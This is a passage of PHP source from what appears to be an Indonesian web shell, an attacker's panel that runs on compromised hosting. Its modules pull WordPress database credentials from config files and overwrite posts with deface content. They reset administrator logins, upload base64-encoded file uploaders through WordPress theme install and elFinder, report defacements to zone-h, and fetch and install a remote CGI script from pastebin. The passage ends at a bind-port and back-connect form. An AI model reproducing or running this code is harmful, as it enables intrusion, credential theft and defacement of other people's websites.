";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t$smpt_hunter = scj($dir);\r\n\techo $smpt_hunter;\r\n} elseif($_GET[\'do\'] == \'auto_wp\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\t$title = htmlspecialchars($_POST[\'new_title\']);\r\n\t\t$pn_title = str_replace(" ", "-", $title);\r\n\t\tif($_POST[\'cek_edit\'] == "Y") {\r\n\t\t\t$script = $_POST[\'edit_content\'];\r\n\t\t} else {\r\n\t\t\t$script = $title;\r\n\t\t}\r\n\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t$scan_conf = scandir($conf);\r\n\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."posts";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET post_title=\'$title\',post_content=\'$script\',post_name=\'$pn_title\',post_status=\'publish\',comment_status=\'open\',ping_status=\'open\',post_type=\'post\',comment_count=\'1\' WHERE id=\'$id\'");\r\n\t\t\t\t$update .= mysql_query("UPDATE $option SET option_value=\'$title\' WHERE option_name=\'blogname\' OR option_name=\'blogdescription\'");\r\n\t\t\t\techo "
";\r\n\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\techo "URL: error, gabisa ambil nama domain nya -> ";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "URL: $target/?p=$id -> ";\r\n\t\t\t\t}\r\n\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\techo "MySQL Error: ".mysql_error()."
";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "sukses di ganti.
";\r\n\t\t\t\t}\r\n\t\t\t\techo "
";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\t

Auto Edit Title+Content WordPress

\r\n\t\t
\r\n\t\tDIR Config:
\r\n\t\t

\r\n\t\tSet Title:
\r\n\t\t

\r\n\t\tEdit Content?: YN
\r\n\t\tJika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.
\r\n\t\t
\r\n\t\t
\r\n\t\t
\r\n\t\tNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
\r\n\t\t";\r\n\t}\r\n } if($_GET[\'do\'] == \'elfinder\') {\r\n\t echo "
\r\nTarget:
\r\n
\r\n\r\n";\r\necho "
\r\n";\r\necho "\r\n";\r\n// L4N4N9_4K1R4\r\nfunction ngirim($url, $isi) { \r\n$ch = curl_init ("$url");\r\n\t curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t curl_setopt ($ch, CURLOPT_POST, 1);\r\n\t curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);\r\n\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'coker_log\');\r\n\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'coker_log\');\r\n$data3 = curl_exec ($ch);\r\nreturn $data3;\r\n}\r\n$target = explode("\\r\\n", $_POST[\'target\']);\r\nif($_POST[\'x\']) {\r\n\tforeach($target as $korban) {\r\n\t\t$nama_doang = "ink.php";\r\n\t\t$isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";\r\n\t\t$decode_isi = base64_decode($isi_nama_doang);\r\n\t\t$encode = base64_encode($nama_doang);\r\n\t\t$fp = fopen($nama_doang,"w");\r\n\t\tfputs($fp, $decode_isi);\r\n\t\techo "[+] $korban
";\r\n\t\techo "# Upload[1] ......
";\r\n\t\t$url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";\r\n\t\t$b = file_get_contents("$url_mkfile");\r\n \t\t$post1 = array(\r\n\t\t\t\t"cmd" => "put",\r\n\t\t\t\t"target" => "l1_$encode",\r\n\t\t\t\t"content" => "$decode_isi",\r\n\t\t\t\t);\r\n \t\t$post2 = array(\r\n \t\t\t\t"current" => "8ea8853cb93f2f9781e0bf6e857015ea",\r\n \t\t\t\t"upload[]" => "@$nama_doang",);\r\n \t\t$output_mkfile = ngirim("$korban", $post1);\r\n \t\tif(preg_match("/$nama_doang/", $output_mkfile)) {\r\n \t\techo "# Upload Success 1... => $nama_doang
# Coba buka di ../../elfinder/files/...

";\r\n\t\t} else {\r\n \t\t\techo "# Upload Failed 1
# Uploading 2..
";\r\n\t\t\t$upload_ah = ngirim("$korban?cmd=upload", $post2);\r\n\t\t\tif(preg_match("/$nama_doang/", $upload_ah)) {\r\n \t\t\techo "# Upload Success 2 => $nama_doang
# Coba buka di ../../elfinder/files/...

";\r\n\t\t\t} else {\r\n \t\t\techo "# Upload Failed 2

";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n \r\n} elseif($_GET[\'do\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick = $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";\r\n\t\techo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url -> OK
";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url -> ERROR
";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\tDefacer:
\r\n\t\t
\r\n\t\tDomains:
\r\n\t\t
\r\n\t\t\r\n\t\t
";\r\n\t}\r\n\techo "
";\r\n} elseif($_GET[\'do\'] == \'cgi\') {\r\n\t$cgi_dir = mkdir(\'idx_cgi\', 0755);\r\n\t$file_cgi = "idx_cgi/cgi.izo";\r\n\t$isi_htcgi = "AddHandler cgi-script .izo";\r\n\t$htcgi = fopen(".htaccess", "w");\r\n\tfwrite($htcgi, $isi_htcgi);\r\n\tfclose($htcgi);\r\n\t$cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");\r\n\t$cgi = fopen($file_cgi, "w");\r\n\tfwrite($cgi, $cgi_script);\r\n\tfclose($cgi);\r\n\tchmod($file_cgi, 0755);\r\n\techo "";\r\n} elseif($_GET[\'do\'] == \'fake_root\') {\r\n\tob_start();\r\n\t$cwd = getcwd();\r\n\t$ambil_user = explode("/", $cwd);\r\n\t$user = $ambil_user[2];\r\n\tif($_POST[\'reverse\']) {\r\n\t\t$site = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$file = $_POST[\'file\'];\r\n\t\tforeach($site as $url) {\r\n\t\t\t$cek = getsource("$url/~$user/$file");\r\n\t\t\tif(preg_match("/hacked/i", $cek)) {\r\n\t\t\t\techo "URL: $url/~$user/$file -> Fake Root!
";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\tFilename:

\r\n\t\tUser:

\r\n\t\tDomain:
\r\n\t\t
\r\n\t\t\r\n\t\t

\r\n\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'adminer\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t \t curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "
-> adminer login <-
";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "
-> adminer login <-
";\r\n\t\t} else {\r\n\t\t\techo "
gagal buat file adminer
";\r\n\t\t}\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$scan = $_POST[\'link_config\'];\r\n\t\t$link_config = scandir($scan);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "ink";\r\n\t\t$pass = "ink";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link_config as $dir_config) {\r\n\t\t\tif(!is_file("$scan/$dir_config")) continue;\r\n\t\t\t$config = file_get_contents("$scan/$dir_config");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\t\techo "[-] error, gabisa ambil nama domain nya
";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[+] $target
";\r\n\t\t\t\t}\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\t\techo "[-] MySQL Error: ".mysql_error()."

";\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t\t$www = "m.php";\r\n\t\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t\t);\r\n\t\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t\t$y = date("Y");\r\n\t\t\t\t\t$m = date("m");\r\n\t\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \t \techo "[+] berhasil mepes...
";\r\n \t \techo "[+] $as

"; \r\n \t } else {\r\n \t echo "[-] gagal mepes...
";\r\n \t echo "[!!] coba aja manual:
";\r\n \t echo "[+] $target/wp-login.php
";\r\n \t echo "[+] username: $user
";\r\n \t echo "[+] password: $pass

"; \r\n \t }\r\n \t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "

WordPress Auto Deface

\r\n\t\t
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t
\r\n\t\t
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )\r\n\t\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp2\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION,true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$link = explode("\\r\\n", $_POST[\'link\']);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "ink";\r\n\t\t$pass = "ink";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link as $dir_config) {\r\n\t\t\t$config = anucurl($dir_config);\r\n\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t$option = $dbprefix."options";\r\n\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t$id = $result[ID];\r\n\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t$target = $result2[option_value];\r\n\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\techo "[-] error, gabisa ambil nama domain nya
";\r\n\t\t\t} else {\r\n\t\t\t\techo "[+] $target
";\r\n\t\t\t}\r\n\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\techo "[-] MySQL Error: ".mysql_error()."

";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t} else {\r\n\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t$www = "m.php";\r\n\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t);\r\n\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t$y = date("Y");\r\n\t\t\t\t$m = date("m");\r\n\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \techo "[+] berhasil mepes...
";\r\n \techo "[+] $as

"; \r\n } else {\r\n echo "[-] gagal mepes...
";\r\n echo "[!!] coba aja manual:
";\r\n echo "[+] $target/wp-login.php
";\r\n echo "[+] username: $user
";\r\n echo "[+] password: $pass

"; \r\n }\r\n \tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "

WordPress Auto Deface V.2

\r\n\t\t
\r\n\t\tLink Config:
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'network\') {\r\n\techo "
\r\n\tBind Port:
\r\n\tPORT: \r\n\t>\'>\r\n\t
\r\n\t
\r\n\tBack Connect:
\r\n\tServer:   \r\n\tPORT: \r\n\t>\'>\r\n\t
